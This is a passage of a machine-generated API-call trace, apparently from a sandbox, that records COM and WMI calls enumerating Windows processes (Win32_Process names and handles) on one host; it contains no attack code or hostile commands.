(bstr="school_for.exe") returned 0x1c [0224.560] IWbemClassObject:Get (in: This=0x5e8b1c0, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e558c*=8, plFlavor=0x26e5590*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="school_for.exe", varVal2=0x0), pType=0x26e558c*=8, plFlavor=0x26e5590*=0) returned 0x0 [0224.560] SysStringByteLen (bstr="school_for.exe") returned 0x1c [0224.560] SysStringByteLen (bstr="school_for.exe") returned 0x1c [0224.560] CoTaskMemAlloc (cb=0x4) returned 0x5e893d0 [0224.560] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e893d0, puReturned=0x26dde18 | out: apObjects=0x5e893d0*=0x5e8b638, puReturned=0x26dde18*=0x1) returned 0x0 [0224.561] IUnknown:QueryInterface (in: This=0x5e8b638, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x5e8b638) returned 0x0 [0224.561] IUnknown:QueryInterface (in: This=0x5e8b638, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.561] IUnknown:QueryInterface (in: This=0x5e8b638, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.561] IUnknown:AddRef (This=0x5e8b638) returned 0x3 [0224.561] IUnknown:QueryInterface (in: This=0x5e8b638, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.561] IUnknown:QueryInterface (in: This=0x5e8b638, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.561] IUnknown:QueryInterface (in: This=0x5e8b638, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x5e8b63c) returned 0x0 [0224.561] IMarshal:GetUnmarshalClass (in: This=0x5e8b63c, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.561] IUnknown:Release (This=0x5e8b63c) returned 0x3 [0224.561] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.561] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.561] IUnknown:QueryInterface (in: This=0x5e8b638, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.562] IUnknown:Release (This=0x5e8b638) returned 0x2 [0224.562] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.562] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.562] IUnknown:QueryInterface (in: This=0x5e8b638, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x5e8b638) returned 0x0 [0224.562] IUnknown:AddRef (This=0x5e8b638) returned 0x4 [0224.562] IUnknown:Release (This=0x5e8b638) returned 0x3 [0224.562] IUnknown:Release (This=0x5e8b638) returned 0x2 [0224.562] CoTaskMemFree (pv=0x5e893d0) [0224.562] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.562] IUnknown:AddRef (This=0x5e8b638) returned 0x3 [0224.562] IWbemClassObject:Get (in: This=0x5e8b638, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.562] IWbemClassObject:Get (in: This=0x5e8b638, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2424\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.562] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2424\"") returned 0x66 [0224.562] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2424\"") returned 0x66 [0224.563] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.563] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.563] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.563] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.563] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e893d0) returned 0x0 [0224.564] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e893d0, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.564] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e893d0, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5e8a5f0) returned 0x0 [0224.564] WbemDefPath:IUnknown:Release (This=0x5e893d0) returned 0x0 [0224.564] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a5f0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5e8a5f0) returned 0x0 [0224.564] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a5f0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.564] WbemDefPath:IUnknown:AddRef (This=0x5e8a5f0) returned 0x3 [0224.564] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a5f0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.564] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a5f0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.564] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a5f0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e893e0) returned 0x0 [0224.564] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e893e0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.564] WbemDefPath:IUnknown:Release (This=0x5e893e0) returned 0x3 [0224.564] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.564] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.564] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a5f0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.564] WbemDefPath:IUnknown:Release (This=0x5e8a5f0) returned 0x2 [0224.565] WbemDefPath:IUnknown:Release (This=0x5e8a5f0) returned 0x1 [0224.565] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.565] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.565] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a5f0, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5e8a5f0) returned 0x0 [0224.565] WbemDefPath:IUnknown:AddRef (This=0x5e8a5f0) returned 0x3 [0224.565] WbemDefPath:IUnknown:Release (This=0x5e8a5f0) returned 0x2 [0224.565] WbemDefPath:IWbemPath:SetText (This=0x5e8a5f0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2424\"") returned 0x0 [0224.565] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.565] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: puBuffLength=0x36f1ec*=0xf, pszText=0x0) returned 0x0 [0224.565] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1ec*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.565] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1bc | out: puCount=0x36f1bc*=0x2) returned 0x0 [0224.565] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0x0, pszText=0x0 | out: puBuffLength=0x36f1b8*=0xf, pszText=0x0) returned 0x0 [0224.565] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1b8*=0xf, pszText="00000000000000" | out: puBuffLength=0x36f1b8*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0224.565] IWbemClassObject:Get (in: This=0x5e8b638, wszName="Name", lFlags=0, pVal=0x36f1b8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e5e08*=0, plFlavor=0x26e5e0c*=0 | out: pVal=0x36f1b8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="whosefirmthe.exe", varVal2=0x0), pType=0x26e5e08*=8, plFlavor=0x26e5e0c*=0) returned 0x0 [0224.565] SysStringByteLen (bstr="whosefirmthe.exe") returned 0x20 [0224.565] SysStringByteLen (bstr="whosefirmthe.exe") returned 0x20 [0224.565] IWbemClassObject:Get (in: This=0x5e8b638, wszName="Name", lFlags=0, pVal=0x36f1c0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x26e5e08*=8, plFlavor=0x26e5e0c*=0 | out: pVal=0x36f1c0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="whosefirmthe.exe", varVal2=0x0), pType=0x26e5e08*=8, plFlavor=0x26e5e0c*=0) returned 0x0 [0224.565] SysStringByteLen (bstr="whosefirmthe.exe") returned 0x20 [0224.565] SysStringByteLen (bstr="whosefirmthe.exe") returned 0x20 [0224.565] CoTaskMemAlloc (cb=0x4) returned 0x5e89410 [0224.565] IEnumWbemClassObject:Next (in: This=0x70f9f0, lTimeout=-1, uCount=0x1, apObjects=0x5e89410, puReturned=0x26dde18 | out: apObjects=0x5e89410*=0x7423d8, puReturned=0x26dde18*=0x1) returned 0x0 [0224.666] IUnknown:QueryInterface (in: This=0x7423d8, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e81c | out: ppvObject=0x36e81c*=0x7423d8) returned 0x0 [0224.666] IUnknown:QueryInterface (in: This=0x7423d8, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e7d0 | out: ppvObject=0x36e7d0*=0x0) returned 0x80004002 [0224.666] IUnknown:QueryInterface (in: This=0x7423d8, riid=0x71e41e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36e5f8 | out: ppvObject=0x36e5f8*=0x0) returned 0x80004002 [0224.666] IUnknown:AddRef (This=0x7423d8) returned 0x3 [0224.666] IUnknown:QueryInterface (in: This=0x7423d8, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e12c | out: ppvObject=0x36e12c*=0x0) returned 0x80004002 [0224.666] IUnknown:QueryInterface (in: This=0x7423d8, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e0dc | out: ppvObject=0x36e0dc*=0x0) returned 0x80004002 [0224.666] IUnknown:QueryInterface (in: This=0x7423d8, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e0e8 | out: ppvObject=0x36e0e8*=0x7423dc) returned 0x0 [0224.666] IMarshal:GetUnmarshalClass (in: This=0x7423dc, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e0f0 | out: pCid=0x36e0f0*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0224.666] IUnknown:Release (This=0x7423dc) returned 0x3 [0224.666] CoGetContextToken (in: pToken=0x36e148 | out: pToken=0x36e148) returned 0x0 [0224.666] CoGetContextToken (in: pToken=0x36e55c | out: pToken=0x36e55c) returned 0x0 [0224.666] IUnknown:QueryInterface (in: This=0x7423d8, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e5dc | out: ppvObject=0x36e5dc*=0x0) returned 0x80004002 [0224.667] IUnknown:Release (This=0x7423d8) returned 0x2 [0224.667] CoGetContextToken (in: pToken=0x36eb44 | out: pToken=0x36eb44) returned 0x0 [0224.667] CoGetContextToken (in: pToken=0x36eaa4 | out: pToken=0x36eaa4) returned 0x0 [0224.667] IUnknown:QueryInterface (in: This=0x7423d8, riid=0x36eb74*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x36eb70 | out: ppvObject=0x36eb70*=0x7423d8) returned 0x0 [0224.667] IUnknown:AddRef (This=0x7423d8) returned 0x4 [0224.667] IUnknown:Release (This=0x7423d8) returned 0x3 [0224.667] IUnknown:Release (This=0x7423d8) returned 0x2 [0224.667] CoTaskMemFree (pv=0x5e89410) [0224.667] CoGetContextToken (in: pToken=0x36eeb4 | out: pToken=0x36eeb4) returned 0x0 [0224.667] IUnknown:AddRef (This=0x7423d8) returned 0x3 [0224.667] IWbemClassObject:Get (in: This=0x7423d8, wszName="__GENUS", lFlags=0, pVal=0x36f1b4*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f234*=0, plFlavor=0x36f230*=0 | out: pVal=0x36f1b4*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x36f234*=3, plFlavor=0x36f230*=64) returned 0x0 [0224.667] IWbemClassObject:Get (in: This=0x7423d8, wszName="__PATH", lFlags=0, pVal=0x36f198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x36f21c*=0, plFlavor=0x36f218*=0 | out: pVal=0x36f198*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2432\"", varVal2=0x0), pType=0x36f21c*=8, plFlavor=0x36f218*=64) returned 0x0 [0224.668] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2432\"") returned 0x66 [0224.668] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2432\"") returned 0x66 [0224.668] CoGetObjectContext (in: riid=0x2414360*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36f1c4 | out: ppv=0x36f1c4*=0x6ee4bc) returned 0x0 [0224.668] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ee4bc, pAptType=0x36f1bc | out: pAptType=0x36f1bc*=1) returned 0x0 [0224.668] IUnknown:QueryInterface (in: This=0x6ee4bc, riid=0x2414348*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x36f1c0 | out: ppvObject=0x36f1c0*=0x0) returned 0x80004002 [0224.668] IUnknown:Release (This=0x6ee4bc) returned 0x1 [0224.669] CoGetClassObject (in: rclsid=0x761ab4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x71ea6bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x36eb30 | out: ppv=0x36eb30*=0x5e89410) returned 0x0 [0224.669] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e89410, riid=0x71e6dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x36ed48 | out: ppvObject=0x36ed48*=0x0) returned 0x80004002 [0224.669] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5e89410, pUnkOuter=0x0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36ed54 | out: ppvObject=0x36ed54*=0x5e8a6d0) returned 0x0 [0224.669] WbemDefPath:IUnknown:Release (This=0x5e89410) returned 0x0 [0224.669] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a6d0, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e974 | out: ppvObject=0x36e974*=0x5e8a6d0) returned 0x0 [0224.669] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a6d0, riid=0x71e41b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x36e928 | out: ppvObject=0x36e928*=0x0) returned 0x80004002 [0224.669] WbemDefPath:IUnknown:AddRef (This=0x5e8a6d0) returned 0x3 [0224.669] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a6d0, riid=0x71e4182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x36e284 | out: ppvObject=0x36e284*=0x0) returned 0x80004002 [0224.669] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a6d0, riid=0x71e41764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x36e234 | out: ppvObject=0x36e234*=0x0) returned 0x80004002 [0224.669] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a6d0, riid=0x71d71388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e240 | out: ppvObject=0x36e240*=0x5e89420) returned 0x0 [0224.669] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5e89420, riid=0x71d52a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x36e248 | out: pCid=0x36e248*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0224.669] WbemDefPath:IUnknown:Release (This=0x5e89420) returned 0x3 [0224.669] CoGetContextToken (in: pToken=0x36e2a0 | out: pToken=0x36e2a0) returned 0x0 [0224.670] CoGetContextToken (in: pToken=0x36e6b4 | out: pToken=0x36e6b4) returned 0x0 [0224.670] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a6d0, riid=0x71e41aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x36e734 | out: ppvObject=0x36e734*=0x0) returned 0x80004002 [0224.670] WbemDefPath:IUnknown:Release (This=0x5e8a6d0) returned 0x2 [0224.670] WbemDefPath:IUnknown:Release (This=0x5e8a6d0) returned 0x1 [0224.670] CoGetContextToken (in: pToken=0x36f044 | out: pToken=0x36f044) returned 0x0 [0224.670] CoGetContextToken (in: pToken=0x36efa4 | out: pToken=0x36efa4) returned 0x0 [0224.670] WbemDefPath:IUnknown:QueryInterface (in: This=0x5e8a6d0, riid=0x36f074*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x36f070 | out: ppvObject=0x36f070*=0x5e8a6d0) returned 0x0 [0224.670] WbemDefPath:IUnknown:AddRef (This=0x5e8a6d0) returned 0x3 [0224.670] WbemDefPath:IUnknown:Release (This=0x5e8a6d0) returned 0x2 [0224.670] WbemDefPath:IWbemPath:SetText (This=0x5e8a6d0, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\root\\cimv2:Win32_Process.Handle=\"2432\"") returned 0x0 [0224.670] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x768a58, puCount=0x36f1f0 | out: puCount=0x36f1f0*=0x2) returned 0x0 [0224.670] WbemDefPath:IWbemPath:GetText (in: This=0x768a58, lFlags=4, puBuffLength=0x36f1ec*=0x0, pszText=0x0 | out: 